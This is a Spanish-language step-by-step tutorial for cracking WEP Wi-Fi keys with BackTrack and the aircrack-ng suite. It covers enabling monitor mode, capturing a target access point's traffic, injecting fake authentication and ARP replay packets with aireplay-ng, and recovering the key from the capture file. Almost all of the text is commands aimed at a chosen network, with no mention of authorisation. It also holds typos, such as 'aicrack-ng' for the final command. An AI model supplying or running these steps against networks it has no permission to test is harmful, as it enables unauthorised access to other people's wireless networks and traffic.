Crackear claves wepDescargar BackTrack
http://www.backtrack-linux.org/downloads/ (En lo particular
prefiero la versin GNOME) y quemarlo en un DVD
Insertamos el DVD y arrancamos nuestra pc desde la unidad de
CD/DVD
Nos aparecer de la siguiente manera (En la versin BackTrack5
GNOME-32 aunque no varia en las otras) y seleccionamos BackTrack
Debug Safe Mode, esto para evitar algunos problemas.
Despues escribimos el comando startx
Esto iniciara la interface grafica.
Bueno comencemos.
Lo primero es saber el nombre de nuestra interface (tarjeta
wireless) para ponerla en modo monitor, asi que abrimos una
terminal dando clic en el icono negro (Imagen anterior)Escribimos
el comando airmon-ng Ya que conocemos nuestra interface la ponemos
en modo monitor airmon-ng start Nombre_de_nuestra_ interface en
este caso es wlan0 (variar dependiendo del fabricante de su
tarjeta) as que quedara: airmon-ng start wlan0
Ya tenemos nuestra interface en modo monitor (monitor mode
enabled on mon0)
Para verificar que esto es cierto podemos escribir el comando
airmon-ng y nos apaecera de la siguiente manera
Interface Chipset Driver
wlan0 Broadcom b43 [phy0]
mon0 Broadcom b43 [phy0]
mon0 es la interface en modo monitor.
Vamos a escanear las redes disponibles con el comando
airodump-ng interface_modo_monitorQuedara asi airodump-ng mon0 y
comenzara a mostarnos las redes disponibles.
Detenemos el escaneo Ctrl+C
Escogemosuna red y anotamos los siguientes dato el BSSID y CH
(canal del punto de acceso)Siguiente comando airodump-ng -w redes
-c 4 --bssid 00:1F:B3:85:89:D1 mon0Donde
-w especifica que se va a guardar un archivo-c canal del punto
de acceso
--bssid mac del punto de acceso
mon0 interface en modo monitor Nos aparecer algo asi
Abrimos una segunda terminal y escribimos el sig. Comando
aireplay-ng -1 0 -a 00:1F:B3:85:89:D1 mon0
Abrimos una tercera terminal y el siguiente comando aireplay-ng
-3 -b 00:1F:B3:85:89:D1 mon0con el cual enviaremos y recibiremos
paquetes
Vamos a la primera terminal y en la columna #Data se
incrementara rpidamente , esperamos a que llegue a los 30,000 datos
para poder descifrar la clave. Cuando tengamos los suficientes
datos presionamos Ctrl+C en la tercera y primera terminal para
detener el envio y captura de datos.
Abrimos una cuarta terminal y escribimos el comando dir esto nos
mostrara los archivos que se guardaronNos aparecen varios archivos,
el que nos interesa es el que tiene la extensin .cap escribimos el
comando
aicrack-ng redes-01.cap y descifrara la clave.
Terminal